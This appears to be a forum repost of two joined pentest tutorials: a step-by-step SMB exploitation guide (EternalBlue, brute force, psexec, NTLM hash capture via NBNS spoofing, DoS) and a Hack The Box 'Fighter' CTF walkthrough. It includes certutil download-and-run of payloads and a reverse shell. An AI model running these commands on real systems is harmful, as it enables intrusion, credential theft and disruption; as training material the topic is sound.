05-14-2020, 11:10 AM
| 0 | 0 | ||
Table of Content
Introduction to SMB Protocol
- Working of SMB
- Versions of Windows SMB
- SMB Protocol Security
Scanning Vulnerability
Multiple Ways to Exploit SMB
- Eternal Blue
- SMB login via Brute Force
- PSexec to connect SMB
- Rundll32 One-liner to Exploit SMB
- SMB Exploit via NTLM Capture
Post Exploitation
File Sharing
- smbserver
- smbclient
Server Message Block (SMB), the modern dialect of which was known as Common Internet File System, operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request
Working of SMB
SMB functions as a request-response or client-server protocol. The only time that the protocol does not work in a response-request framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the current mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBUI. Once the connection is established, the client computer or program can then open, read/write, and access files similar to the file system on a local computer.
Versions of Windows SMB
CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.
SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.
SMB 2.0 / SMB2: This version used in Windows Vista and Windows Server 2008.
SMB 2.1 / SMB2.1: This version used in Windows 7 and Windows Server 2008 R2.
SMB 3.0 / SMB3: This version used in Windows 8 and Windows Server 2012.
SMB 3.02 / SMB3: This version used in Windows 8.1 and Windows Server 2012 R2.
SMB 3.1: This version used in Windows Server 2016 and Windows 10.
Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3, and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.
SMB Protocol Security
The SMB protocol supports two levels of security. The first is the share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core plus SMG protocol definitions. User level protection was later added to the SMB protocol. It is applied to individual files and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.
SMB Enumeration
To identify the following information of Windows or Samba system, every pentester go for SMB enumeration during network penetration testing.
- Banner Grabbing
- RID cycling
- User listing
- Listing of group membership information
- Share enumeration
- Detecting if a host is in a workgroup or a domain
- Identifying the remote operating system
- Password policy retrieval
nmap -p 445 -A 192.168.1.101
1
nmap -p 445 -A 192.168.1.101
As a result, we enumerated the following information about the target machine:
Operating System: Windows 7 ultimate
Computer Name & NetBIOS Name: Raj
SMB security mode: SMB 2.02
There are so many automated scripts and tools available for SMB enumeration and if you want to know more about SMB Enumeration then read this article “
[To see content please register here]
”.![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-R8gh5vnWzyc/XDdqxE2WnfI/AAAAAAAAb_w/z9kghTB0lb8cBSzIMxWNjfc4PGCcUBV2gCLcBGAs/s1600/1.png?w=687&ssl=1)
Scanning Vulnerability
During the enumeration phase, generally, we go for banner grabbing to identify a version of running service and the host operating system. Once you enumerate this information then you should go for vulnerability scanning phase to identify whether the install service is a vulnerable version or patched version.
Nmap serves various scripts to identify a state of vulnerability for specific services, similarly, it has the inbuilt script for SMB to identify its vulnerable state for given target IP.
nmap --script smb-vuln* -p 445 192.168.1.101
1
nmap --script smb-vuln* -p 445 192.168.1.101
As result, it has shown the target machine is highly vulnerable to Ms17-010 (eternal blue) due to SMBv1.
To know more about Ms17-010 read the complete article “
[To see content please register here]
”![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-8lLqagf8b2U/XDdqzFniIlI/AAAAAAAAcAI/N89ueLJuUjoy_8wFFQJ3YEdlezpWu0mwACLcBGAs/s1600/2.png?w=687&ssl=1)
Multiple Ways to Exploit SMB
Eternal Blue
As we know it is vulnerable to MS17-010 and we can use Metasploit to exploit this machine. Therefore we run the following module which will directly exploit the target machine.
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit
1
2
3
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit
Boom!! We have successfully access remote machine shell as shown in the bellow image.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-EULTxpgGuks/XDdq0w2bKjI/AAAAAAAAcAc/ALHVMAQ_jQUQgqJfXcNmhdjJ1anY8LFWQCLcBGAs/s1600/3.png?w=687&ssl=1)
SMB login via Brute Force
If you get fail to enumerate the vulnerable state of SMB or found a patched version of SMB in the target machine, then we have “Brute force” as another option to gain unauthorized access of remote machine.
Here we only need two dictionaries that contain a list of username and password in each and a brute force tool to make brute force attack.
hydra -L user.txt -P pass.txt 192.168.1.101 smb
1
hydra -L user.txt -P pass.txt 192.168.1.101 smb
-L –> denotes the path of username list
-P –>denote the path of password
Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. After a few minutes, Hydra cracks the credential, as you can observe that we had successfully grabbed the SMB username as raj and password as 123.
To know more about it, read the complete article from here “
[To see content please register here]
”![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-pYLFETRaLLI/XDdq02rBC4I/AAAAAAAAcAg/zpEsCaJCWyIVXeLSSEH4Ah2AfamBWY1bwCLcBGAs/s1600/4.png?w=687&ssl=1)
If you have SMB login credential, then you can use the following module to determine what local users exist via the SAM RPC service.
use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit
1
2
3
4
5
use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-easXQUVMMHI/XDdq1HGcazI/AAAAAAAAcAk/mdqbwmAEZAIqeNgt3PAnDvbdT31li79LQCLcBGAs/s1600/5.png?w=687&ssl=1)
PSexec – To Connect SMB
Once you have SMB login credential of target machine then with the help of the following module of Metasploit you can obtain meterpreter session to access the remote shell.
use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit
1
2
3
4
5
use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit
Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.
There so many script and tools are available to connect remote machine using SMB protocol, we have already written an article for connecting SMB in multiple ways. Read complete article from here “
[To see content please register here]
”.![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-2VwGbpN75qQ/XDdq1030osI/AAAAAAAAcAo/PQK7-pcye2sEdDMaFfSfEHwuA6Ax6VuvQCLcBGAs/s1600/6.png?w=687&ssl=1)
Rundll32 One-liner to Exploit SMB
This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit
1
2
3
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit
This will generate a link for malicious DLL file, now send this link to your target and wait for his action.
![[Image: 7.1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ILyFnlO2QH4/XDdq2S40sZI/AAAAAAAAcAw/08B105BCsbQLRZeeP3tFHk04MN6CSGahgCLcBGAs/s1600/7.1.png?w=687&ssl=1)
As soon as the victim will run above malicious code inside the run prompt or command prompt, we will get a meterpreter session at Metasploit.
![[Image: 7.2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-EWw0FP0aHuk/XDdq2BNe2XI/AAAAAAAAcAs/IH2L_9HMjWMoKEwiVxv9ocjakWfUrd4lACLcBGAs/s1600/7.2.png?w=687&ssl=1)
SMB Exploit via NTLM Capture
Another method to exploit SMB is NTLM hash capture by capturing response password hashes of SMB target machine.
This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the Ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.
use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost 192.168.1.109
msf auxiliary(smb) > set johnpwfile /root/Desktop/
msf auxiliary(smb) > exploit
1
2
3
4
use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost 192.168.1.109
msf auxiliary(smb) > set johnpwfile /root/Desktop/
msf auxiliary(smb) > exploit
Simultaneously run NBNS_response module under capture smb module.
This module forges the NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.
auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.1.109
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) >exploit
1
2
3
4
auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.1.109
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) >exploit
As result, this module will generate a fake window security prompt on the victim’s system to establish a connection with another system in order to access shared folders of that system.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-ivggaBnB2t8/XDdq22At6JI/AAAAAAAAcA0/x-zeHw9DO24DXf6MtOgOuv9BdLP5phLdACLcBGAs/s1600/7.png?w=687&ssl=1)
We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from the given image you can observe that port 137 is open for NetBIOS network service in our local machine.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-lIMYcf10C3c/XDdq3KyQmPI/AAAAAAAAcA4/Zbc_y3agTSAq5wT9C_5gJv9ObbS4u_5sACLcBGAs/s1600/8.png?w=687&ssl=1)
Now when the victim will try to access our share folder, therefore, he will try of connecting with us through his network IP, given below image is a proof to demonstrate that victim is connecting malicious IP: 192.168.1.109. When the victim will try to access the shared folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing shared folders.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-xZGkkoH8pZY/XDdq3TJPJ8I/AAAAAAAAcA8/J45kWsZx4XUbZBKpHk4pIpQfCE8ZcPB7QCLcBGAs/s1600/9.png?w=687&ssl=1)
Awesome!! Once again the attacker had captured NTMLv2 hash, from the given image you can see that here also the attacker has captured:
Username: raj
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-14hHhTf5hlY/XDdqxN4713I/AAAAAAAAb_0/sbGmRpLiBxoU027eTTInlmWe11r3Ag8IwCLcBGAs/s1600/10.png?w=687&ssl=1)
Now use john the ripper to crack the ntlmv2 hash by executing given below command
john john_smb_netntlmv2
1
john john_smb_netntlmv2
From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.
To know more about it read the complete article from here “
[To see content please register here]
”![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-cRxmG5y4Tqs/XDdqxdcsbXI/AAAAAAAAb_4/G5cOJA8zi9k03fcA2SzmsM7MsbBb1C5WACLcBGAs/s1600/11.png?w=687&ssl=1)
SMB DOS-Attack
SMB Dos attack is another most excellent method we have in our Metasploit framework.
This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer or a Word document otherwise.
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit
1
2
3
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit
Now, when the victim will try to access the shared folder through our malicious IP, the target machine will get crushed and this attack is very effective.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-HzBxgU0aFJY/XDdqyEHOHgI/AAAAAAAAcAA/gp6bfWkKKYc9XUSMzSiLsYOsF8JTvTDigCLcBGAs/s1600/13.png?w=687&ssl=1)
Post Exploitation
This module will enumerate configured and recently used file shares.
use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit
1
2
3
use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit
As you can observe that, here it has shown three UNC paths that have been entered in the run dialogue.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-8iIjLlnPqvs/XDdqyfWJ0gI/AAAAAAAAb_8/BEGwkOSBCR4lV-ZJ6F_lsKDWb1f63IMcwCLcBGAs/s1600/17.png?w=687&ssl=1)
File Sharing
Smbexec.py
Now we will use a python script that activates SMB service in our Linux machine. This is useful in the situation where the target machine does NOT have a writeable share available. You can visit
[To see content please register here]
for this python script.I copied the python code from GitHub and past it into a text file as smbserver.py in the desktop folder. Now execute give below command for a shared folder “raj”.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-GQXkOTUqMPo/XDdqy68AzTI/AAAAAAAAcAE/ovTxBxAaeuMcxs37_kUhs8wHVedc5iSGQCLcBGAs/s1600/18.png?w=687&ssl=1)
Since we are aware of smb service which is running in host machine 192.168.1.108 and being using window platform we can access it share folder through Run command prompt.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-FnombA0LI2g/XDdqzEVEFqI/AAAAAAAAcAM/wOrUuoJA0IYBhkns145ASSsq4ZFeDxElACLcBGAs/s1600/19.png?w=687&ssl=1)
Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it. In this way, we can use smb python script for sharing file between Windows and Linux machine.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-TtuSy5VJKDI/XDdqz969ueI/AAAAAAAAcAQ/nHF-BQEjT4weH7G0dpuELVKsk_bld-jXgCLcBGAs/s1600/20.png?w=687&ssl=1)
Smbclient
smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the FTP program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.
smbclient –L 192.168.1.108
1
smbclient –L 192.168.1.108
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ximIczAfuKw/XDdqz8XrxoI/AAAAAAAAcAU/V9LvMXW5XJQqDbAt3MAbvY9GlNz7XMsgwCLcBGAs/s1600/21.png?w=687&ssl=1)
smbclient //192.168.1.108/raj
1
smbclient //192.168.1.108/raj
As you can observe with the help of smbclient we are able to view the shared folder of victim’s machine. Moreover, we can use smbclient for sharing a file in the network. Here you can observe we had login successfully using raj: 123 logins and transfer the user.txt file.
![[Image: 22.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-6VSGsk-o2FI/XDdq0PVEykI/AAAAAAAAcAY/roilY6gIUMMNAAjOktrS0SNQk9ol9qehgCLcBGAs/s1600/22.png?w=687&ssl=1)
Today we are going to solve another CTF challenge “Fighter”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72
Penetrating Methodology
- Network scanning (Nmap)
- Browsing IP address through HTTP
- Adding Domain name to /etc/hosts
- Bruteforcing subdomains
- Adding new domain name to /etc/hosts
- RCE using SQL injection
- Upgrading shell to meterpreter session
- Finding vulnerable service
- Editing Exploit to bypass OS check
- Finding root.exe
- Reversing program to find the password
- Creating a C-program to find the password
- Getting the root flag
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV -sC -T4 10.10.10.72
1
nmap -sV -sC -T4 10.10.10.72
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ZyKyRNxqHmw/XDRpb6iKW2I/AAAAAAAAb9Y/tCdBHn4W6BAk08w-UtWOO7dpZITtjW4OgCLcBGAs/s1600/1.png?w=687&ssl=1)
The Nmap output shows us that there is only 1 port open: 80(HTTP)
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-9aoMvNk5HF0/XDRpdenKgtI/AAAAAAAAb90/kw_4m8OfK04Tfp_qK2yi3dh5H8lBhAHbgCLcBGAs/s1600/2.png?w=687&ssl=1)
We find that port 80 is running http, so we open the IP in our browser.
In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-yEZxq45WQf4/XDRpfgvfyEI/AAAAAAAAb-k/CMDKl7WzXWURiK1lqdv0PDuEieYlwv-_wCLcBGAs/s1600/3.png?w=687&ssl=1)
We don’t find anything new on the webpage, but further looking into the webpage we find that there might be subdomains available that will give us more clues. We intercept the request and send it to the intruder. We select where we want to brute force the request.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-oOdl7U0DRUk/XDRpg95u8mI/AAAAAAAAb-4/_nX7xq_Wh-oxa8K1q-TZQSIgvlidM9ZmgCLcBGAs/s1600/4.png?w=687&ssl=1)
We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-W0XVh_ZB46o/XDRpg8BvbmI/AAAAAAAAb-8/U1QWXQ_E5ysyenL-_MJ6J_M0uOawzK40QCLcBGAs/s1600/5.png?w=687&ssl=1)
After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-gXUUgKlZo-g/XDRphdyTW0I/AAAAAAAAb_A/9VsLHkFfm0EMIRmpjmapfDzQSqiy2ADAACLcBGAs/s1600/6.png?w=687&ssl=1)
We add the subdomain in /etc/hosts so that we can access the web site.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-5YKUfi14LNI/XDRphaVuSTI/AAAAAAAAb_E/1xsR_APIlwIvAZZdem0oONRWFYFB_4oyQCLcBGAs/s1600/7.png?w=687&ssl=1)
We open the webpage and got a 403 Forbidden error.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-OAlrWqApClI/XDRphhnkexI/AAAAAAAAb_I/gGDv36WW4UsGRwGAcyJZKun6cAl-Bvd7gCLcBGAs/s1600/8.png?w=687&ssl=1)
We now run a dirb scan on the members.streetfighter.htb and find a directory called “old”.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-tcDBjO4fSko/XDRphwkEVKI/AAAAAAAAb_M/gitNDAsmww0ZBP28G5eyZyLJiY4COCrEQCLcBGAs/s1600/9.png?w=687&ssl=1)
We then find web pages inside that directory. As we know that it is IIS server we find “asp” files on the web server and find a page called “login.asp”.
dirb
[To see content please register here]
-X .asp1
dirb
[To see content please register here]
-X .asp![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vpnTShG7WSQ/XDRpbsKPSvI/AAAAAAAAb9U/RWDb4_6zt2Uwa9tt3WyM7Fo2T6OdWDzeQCLcBGAs/s1600/10.png?w=687&ssl=1)
We open the web page and find a login page.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-JA7ktsLcWXU/XDRpbry1KiI/AAAAAAAAb9Q/sabMCWGz5RcS9V9IzvsiQtMNhkTk83M_ACLcBGAs/s1600/11.png?w=687&ssl=1)
We enumerate the webpage and find that the web application is vulnerable to SQL injection. We find username, password, and e-mail but were unable to login. So we tried command injection using SQL injection. We referred this
[To see content please register here]
.![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-VtHqs7nQObc/XDRpb62QJYI/AAAAAAAAb9c/AMEqrqEPDN4EKMagdGQ8HFnJDEgzEVNuACLcBGAs/s1600/13.png?w=687&ssl=1)
We set up our listener and got a reverse shell.
nc -lvp 80
1
nc -lvp 80
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-TnNzPxfIkcw/XDRpcbtHNWI/AAAAAAAAb9g/ERn1m0emXKwns21GhiFFHTflkMNvtLUtwCLcBGAs/s1600/14.png?w=687&ssl=1)
We are not able to find anything on the target machine. So we try to convert our shell into meterpreter but are unable to run any exe file. So there was a firewall that didn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use the nps payload to create an XML file that will contain our payload (download from
[To see content please register here]
).![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-iAPFbo6y61c/XDRpcs6taWI/AAAAAAAAb9k/FnoZtltdR8oD3T0Q2tMVm2biSi2xd00DACLcBGAs/s1600/15.png?w=687&ssl=1)
We move into “c:\users\sqlserv” as we have a shell as user sqlserv.
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/--4hKcX72V1Q/XDRpcvi43WI/AAAAAAAAb9o/aImoDFB7nacObVYcnwDcmiIEgLVzjMZxACLcBGAs/s1600/16.png?w=687&ssl=1)
We run the command provided by npc payload to start our listener.
msfconsole -r msbuild_nps.rc
1
msfconsole -r msbuild_nps.rc
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Kk2hYGqNzX0/XDRpc62O1QI/AAAAAAAAb9s/awS1Ubq3r7Iy3hNhKuy--DzHi6lkXHptgCLcBGAs/s1600/17.png?w=687&ssl=1)
We start our python HTTP Server to send our file to the target machine.
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-f-qaZ-PDvWM/XDRpc6ljGBI/AAAAAAAAb9w/rdsBFd7M6S46SOn7obLZNcW3TCxvQ70dwCLcBGAs/s1600/19.png?w=687&ssl=1)
We download the file using certutil.exe on the target machine.
certutil.exe -urlcache -split -f
[To see content please register here]
msbuild_nps.xml1
certutil.exe -urlcache -split -f
[To see content please register here]
msbuild_nps.xml![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-YOR5EoV1i_M/XDRpdtz_gPI/AAAAAAAAb94/c1M_XywNCnwZ82fGTlkQw-lBANjC3lrjACLcBGAs/s1600/20.png?w=687&ssl=1)
We then run the XML file we uploaded using msbuild.exe.
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe msbuild_nps.xml
1
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe msbuild_nps.xml
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-kmpOuJQWM0s/XDRpd7Omf6I/AAAAAAAAb98/iX5umfEEn7cBe-_djkvwXRXw80_UfTlnACLcBGAs/s1600/21.png?w=687&ssl=1)
As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.
![[Image: 22.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-VNns1nIsZr0/XDRpdzqSGtI/AAAAAAAAb-A/BQwfthiKzgMaJc_x6-qyIpR09XGNfGxHgCLcBGAs/s1600/22.png?w=687&ssl=1)
To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.
meterpreter > ps
meterpreter > migrate 2320
1
2
meterpreter > ps
meterpreter > migrate 2320
![[Image: 23.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-mSJ3Ej1Kp30/XDRpeNJNEHI/AAAAAAAAb-E/BJ7sd3zqB5EpEJZfsjh0V-cA21vvUER0gCLcBGAs/s1600/23.png?w=687&ssl=1)
We still don’t find anything to escalate our privilege. As this machine on street fighter game, we try to google street fighter exploit and find that street fighter 5 has privilege escalation vulnerability. We find that street fighter has a service called Capcom, so we check if street fighter 5 is installed on the target machine.
sc query capcom
1
sc query capcom
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-nnsMyJCEzrc/XDRpeUAK3yI/AAAAAAAAb-M/EqZSsJdYkUkoPRrCbhOfeTf4hrrLVqGAgCLcBGAs/s1600/24.png?w=687&ssl=1)
We find this Metasploit exploit
[To see content please register here]
, we try to run it but are unable to get a shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-NDZDycu34Hk/XDRpeQISYLI/AAAAAAAAb-I/Q6paA4RTvn40O3I3_J2kLimf2pG3VX1OQCLcBGAs/s1600/25.png?w=687&ssl=1)
Now we are successfully able to run the exploit.
msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run
1
2
3
4
5
6
msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run
![[Image: 26.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-zpyYXgCg86M/XDRpesDqCpI/AAAAAAAAb-Q/qJC89Mp6WfgqODhna5CVbGGxucFCKq7rQCLcBGAs/s1600/26.png?w=687&ssl=1)
When we check the uid we find that we are successfully able to get administrative rights.
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-76-EQPo2xrk/XDRpe_y4r6I/AAAAAAAAb-U/gqmcfZFgjzwLxluTnVOuUW4sPiKT6svjwCLcBGAs/s1600/27.png?w=687&ssl=1)
We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.
![[Image: 28.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-dgcdlprIUgA/XDRpe9dtPzI/AAAAAAAAb-Y/kTGEondyqmIOyGsZuTucGBnxu-A5NTqkgCLcBGAs/s1600/28.1.png?w=687&ssl=1)
We move into c:\users\Administratror\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”, as the password might be checked using this DLL file.
![[Image: 28.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-diqetAdTAzs/XDRpfZtwZCI/AAAAAAAAb-g/PTwPVdyQ0hsde2pSr4TVW-wMl_vwhFUMQCLcBGAs/s1600/28.png?w=687&ssl=1)
We download both the files into our system using meterpreter.
download root.exe /root/Desktop
download checkdll.dll /root/Desktop
1
2
download root.exe /root/Desktop
download checkdll.dll /root/Desktop
![[Image: 29.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-6nbtWj5aJ5U/XDRpfev36yI/AAAAAAAAb-c/OnnZnTwSK60Ih0hfsDH5sE6BEXqWSkc9gCLcBGAs/s1600/29.png?w=687&ssl=1)
We reverse engineer them using IDA and find that this program XOR’s 9 with each character of the variable aFmFeholH. Now analyzing with IDA tells us that the variable contains “Fm
Code:
The contents of this section are hidden for your groupRegister or Login
Code:
The contents of this section are hidden for your groupRegister or Login
Code:
The contents of this section are hidden for your groupRegister or Login
fEhO1}h”.
![[Image: 31.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-9xKaf4HvwxM/XDRpgOu32VI/AAAAAAAAb-s/vv7lBDRf6Kw0y6Enn2qIv05DGiQVELK2QCLcBGAs/s1600/31.png?w=687&ssl=1)
We compile and run the file and get the password to be “OdioLaFeta”.
![[Image: 32.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-E9UC3DwluIs/XDRpgLE-fWI/AAAAAAAAb-w/Czad-YoUd8QEusH6QBLaCpfIWTHHsFgagCLcBGAs/s1600/32.png?w=687&ssl=1)
